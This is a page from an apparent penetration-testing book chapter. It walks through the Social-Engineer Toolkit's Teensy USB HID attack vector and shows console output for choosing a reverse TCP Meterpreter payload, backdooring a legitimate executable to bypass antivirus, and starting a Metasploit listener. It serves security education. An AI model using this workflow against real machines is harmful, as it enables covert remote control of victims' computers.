158
Chapter 10
Welcome to the Teensy HID Attack Vector.
Special thanks to: IronGeek and WinFang
1. Powershell HTTP GET MSF Payload
2. WSCRIPT HTTP GET MSF Payload
3. Powershell based Reverse Shell
4. Return to the main menu.
Enter your choice:
2
Do you want to create a payload and listener yes or no:
yes
What payload do you want to generate:
Name: Description:
. . . SNIP . . .
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send
back to attacker.
Enter choice (hit enter for default):
Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
. . . SNIP . . .
16. Backdoored Executable (BEST)
Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable
[*] PDE file created. You can get it under 'reports/teensy.pde'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino
Press enter to continue.
[*] Launching MSF Listener...
resource (src/program_junk/meta_config)>
exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
To begin setting up this attack, choose
Teensy USB HID Attack Vector
from the main menu, and then choose
WSCRIPT HTTP GET MSF Payload
. Then
tell SET to set up a payload and listener , selecting the default Meterpreter
payload and encoding method .